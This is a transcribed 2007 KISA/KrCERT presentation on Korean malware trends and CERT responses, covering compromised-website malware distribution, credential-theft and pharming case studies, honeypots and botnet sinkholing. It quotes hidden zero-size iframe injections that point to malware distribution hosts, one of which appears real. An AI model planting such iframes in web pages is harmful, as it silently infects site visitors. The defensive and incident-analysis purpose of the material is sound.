Current counter-measures and responses by CERTs



Similar documents
Korea s experience of massive DDoS attacks from Botnet

Information Security Threat Trends

Using big data analytics to identify malicious content: a case study on spam s

AT&T Global Network Client for Windows Product Support Matrix January 29, 2015

How CNCERT/CC fighting to Botnets. Dr.Mingqi CHEN CNCERT/CC March 31, Beijing

CERT Collaboration with ISP to Enhance Cybersecurity Jinhyun CHO, KrCERT/CC Korea Internet & Security Agency

Security A to Z the most important terms

Dragonfly: Energy Companies Under Sabotage Threat Symantec Security Response

Protect Yourself in the Cloud Age

Cyber Security & Role of CERT-In. Dr. Gulshan Rai Director General, CERT-IN Govt. of India grai@mit.gov.in

COMPARISON OF FIXED & VARIABLE RATES (25 YEARS) CHARTERED BANK ADMINISTERED INTEREST RATES - PRIME BUSINESS*

COMPARISON OF FIXED & VARIABLE RATES (25 YEARS) CHARTERED BANK ADMINISTERED INTEREST RATES - PRIME BUSINESS*

Case 2:08-cv ABC-E Document 1-4 Filed 04/15/2008 Page 1 of 138. Exhibit 8

Mobile Security Framework; Advances in Mobile Governance in Korea. TaeKyung Kim

Cyber Security and Critical Information Infrastructure

Current Threat Scenario and Recent Attack Trends

WEB ATTACKS AND COUNTERMEASURES

Country Case Study on Incident Management Capabilities CERT-TCC, Tunisia

Cisco & Big Data Security

About Botnet, and the influence that Botnet gives to broadband ISP

CITADEL TROJAN OUTGROWING ITS ZEUS ORIGINS

Cybersecurity: Thailand s and ASEAN s priorities. Soranun Jiwasurat

Phone Fax

Analysis One Code Desc. Transaction Amount. Fiscal Period

Zscaler Cloud Web Gateway Test

Proactive Credential Monitoring as a Method of Fraud Prevention and Risk Mitigation. By Marc Ostryniec, vice president, CSID

BOTNETS. Douwe Leguit, Manager Knowledge Center GOVCERT.NL

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix

DDoS Attacks & Defenses

Vulnerability Assessment & Compliance

Intrusion Forecasting Framework for Early Warning System against Cyber Attack

Incident Response. Proactive Incident Management. Sean Curran Director

Indian Computer Emergency Response Team (CERT-In) Annual Report (2010)

Spyware. Michael Glenn Technology Management 2004 Qwest Communications International Inc.

Symantec enterprise security. Symantec Internet Security Threat Report April An important note about these statistics.

Threat Events: Software Attacks (cont.)

Hong Kong Information Security Outlook 2015 香 港 資 訊 保 安 展 望

Botnets: The Advanced Malware Threat in Kenya's Cyberspace

IBM Security Systems Trends and IBM Framework

Security workshop Protection against botnets. Belnet Aris Adamantiadis Brussels 18 th April 2013

DDoS Attacks Can Take Down Your Online Services

Enhanced Vessel Traffic Management System Booking Slots Available and Vessels Booked per Day From 12-JAN-2016 To 30-JUN-2017

BotNets- Cyber Torrirism

Operation Liberpy : Keyloggers and information theft in Latin America

Symantec Cyber Threat Analysis Program Program Overview. Symantec Cyber Threat Analysis Program Team

BUGAT TROJAN JOINS THE MOBILE REVOLUTION

Deep Security Intrusion Detection & Prevention (IDS/IPS) Coverage Statistics and Comparison

How To Protect Your Online Banking From Fraud


The dramatic growth in mobile device malware. continues to escalate at an ever-accelerating. pace. These threats continue to become more

Course Content: Session 1. Ethics & Hacking

Web Application Worms & Browser Insecurity

Top 10 Security Trends

DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest

Fraud and Phishing Scam Response Arrangements in Brazil

AbuseHUB: a national Abuse Report. Clearing House. Phons Bloemen. ISD Congress September 24,

THREAT VISIBILITY & VULNERABILITY ASSESSMENT

Modern Cyber Threats. how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure. Axel Wirth

Cyber Security Metrics Dashboards & Analytics

Deep Security/Intrusion Defense Firewall - IDS/IPS Coverage Statistics and Comparison

Fighting Advanced Threats

A!Team!Cymru!EIS!Report:!Growing!Exploitation!of!Small! OfCice!Routers!Creating!Serious!Risks!

A Critical Investigation of Botnet

Cloud Services Prevent Zero-day and Targeted Attacks

Agenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka

The anatomy of an online banking fraud

Factoring Malware and Organized Crime in to Web Application Security

Countermeasures against Bots

Stop DDoS Attacks in Minutes

Modular Network Security. Tyler Carter, McAfee Network Security

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms

Secure Your Mobile Workplace

AgriLife Information Technology IT General Session January 2010

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks

Integrated Protection for Systems. João Batista Territory Manager

DDos Monitoring System using Cloud AV AhnLab, Inc. SiHaeng Cho, Director of R & D Center

The Key to Secure Online Financial Transactions

UNCLASSIFIED. Briefing to Critical Infrastructure Sector Organizations on the Canadian Cyber Incident Response Centre (CCIRC)

The Mobile Malware Problem

Building The Human Firewall. Andy Sawyer, CISM, C CISO Director of Security Locke Lord

ACCEPTABLE USE AND TAKEDOWN POLICY

IT Security Incident Management Policies and Practices

Cyber Security Incident Handling Policy. Information Technology Services Center (ITSC) of The Hong Kong University of Science and Technology

Security Incidents And Trends In Croatia. Domagoj Klasić

Transcription:

Current counter-measures and responses by CERTs Jeong, Hyun Cheol hcjung@kisa.or.kr April. 2007

Contents I. Malware Trends in Korea II. Malware from compromised Web sites III. Case Study : Malware countermeasure IV. KISC s HoneyNet / HoneyPot V. Epilogue -2-

I. Malware Trends in Korea Infrastructure & On-line services in Korea Good Network Infrastructure - 1.4 Mil 1st Domain - 14 Mil. Broadband Subscribers -27 Mil. PCs Used for attack route - Warm propagation - Host phishing sites for foreign sites Malware in Korea Good On-Line Services - On-Line Games ($630 Mil. 2005) - Internet Banking Service - On-Line Shopping mall Being attack target - Steal On-Line Game ID/PW - Phishing for Korean Internet Banking - ransom DDoS Threat Level 2003.1.25 Slammer CIH ( 99) ) Worm Explosion Virus Worm ) Mal. BOT Phishing ) ) Ad/Spyware 2000 2002 2004 2005 2006-3-

II. Malware from compromised Websites <iframe src="http://web2.163.sh.cn/~mseweb/jz.htm" name="zhu" width="0" Iframe height="0" (0X0) frameborder="0"></iframe> <embed src="images/intro.swf" Injection quality="high" pluginspage="http://www.macromedia.com/g o/getflashplayer" type="application/xshockwave-flash" width="780" height="188"></embed></object></td> Injected Using Escape Code Sequence Injected in HTTP 404 Error Message MC-Finder Mal. Code Download Internet Mal. Code Injection Injected in Advertising Flash File Re-direction to Mal. Code Site Mal. Code Detect and Wipeout KISA Injected to Data Base (Rem.) MC-Finder : Malicious Code Finder -4-

III. Case Study : Malware Countermeasure CASE 1 : 92,000 PCs are infected from 1,000 compromised websites (Feb. 2007) 2. Insert the illegal iframe <iframe src=http://xxx.com/img/jang/music.htm height=0 width=0></iframe> 1. Websites hacking 1,000 Transit sites Foreign Attacker 8. Enjoy game or make money? 7. Online game ID/PW leaked 3. Visit the victim sites 4. Link to the distribution site 6. 92,000 PCs are infected 5. Try attack to 620,000 IPs against MS06-014 Vul. Malware Distribution site (http://xxx.com) Internet Users -5-

III. Case Study : Malware Countermeasure CASE 1 : 92,000 PCs are infected from 1,000 compromised websites (Feb. 2007) How To Detect Find a Transit site(win2k) from MCFinder Find the Distribution site(freebsd) from the Transit site <iframe src=http://xxx.com/img/jang/music.htm height=0 width=0></iframe> Find the other Transit sites (about 1,000 sites) from Dist. Sites referer log [19/Dec/2006:17:24:26 +0900] "GET /img/jang/music.htm HTTP/1.1" 200 2115 "http://www.yyy.com/default.asp" "Mozilla/4.0 How To React Press Release Notify and Fix the Transit / Distribution sites Block some Distribution site from outside of border - Based on The Act on Promotion of Information & Communication Network Utilization and Information Protection, etc Update MCFinder s detection pattern Collect & Supply the malwares related with this case to AV Vendors Learn from this Case Rapid reaction is very important Attacker is not one guy but organized group We need international cooperation and information sharing -6-

III. Case Study : Malware Countermeasure CASE 2 : Pharming with Web hacking (Jan. 2007) 6. Financial information leaked (Account num., account PW, certificate PW, ) Forgery site Origin site Foreign Attacker 4. Certificate file leaked 5. Change direction to forgery banking site & input the financial information 1. Visit Malicious code infected Website Internet Users 3. Install malware & Change hosts file 2. Attack Visito s PC (MS06-014) Malware Distribution site -7-

III. Case Study : Malware Countermeasure CASE 2 : Pharming with Web hacking (Jan. 2007) How To Detect Reported from one bank - There is a phishing site forging our bank. Request for remote assistance from one on-line banking user - My PC is something wrong - We can find the trojan for pharming How To React Announce this incident and supply the list of victim s certificate to the CAs (KISA is the Root CA) CA revoke the victim s Certificate Press Release Collect & Supply the malwares related with this case to AV Vendors Learn from this Case Now, Attackers are targeting not only Game info. But also Korean Financial info. We need more secure on-line banking system. - OTP, Removable Storage for certificate -8-

IV. KISC s HoneyNet / HoneyPot : Network Surv. Time Daily Based Network Survival Time Checking Detailed Survival Time Trends of Survival Time Risk of each malware -9-

IV. KISC s HoneyNet / HoneyPot : Network Surv. Time Network Survival Time 60Min 50Min 40Min '06 Windows XP SP1 '06 Windows 2000 SP4 '07 Windows XP SP1 '07 Windows 2000 SP4 Minute 30Min 20Min 10Min 0Min. Purpose : To check System s Survival Time without any Security Patch and No Login Password Testing Location : Internet Exchanges Neutral Point No ISP s Security Policy involved. Similar with SANS s Survival Time Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Month -10-

IV. KISC s HoneyNet / HoneyPot : BOTNet Sinkhole BOTNet Sinkhole Zombie C&C DNS RR Update Zombie C&C Resolution Internet Sinkhole IP notification Control System Sinkhole connection Zombie PCs ISP DNS -11-

V. Epilogue Cyber Attack becomes more and more criminal & organized We don t have a jurisdiction over cross-border attack Legal system is different among the economies Need stronger international Cyber Law & Cooperation Malware becomes more and more sophisticated & sneaky Sometimes Zero-day vulnerability is exploited for targeted attack Need information sharing of the attack method & pattern Need more Proactive monitoring and Response not depends on incident reporting Compromised web site is one of the major route for malware propagation 69% of vulnerabilities are related with web application (2006. Symantec) Need enhancing the web security and monitoring malware distribution web site (MCFinder is used in KrCERT/CC) -12-

Thank you!! http://www.krcert.or.kr hcjung@kisa.or.kr -13-

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information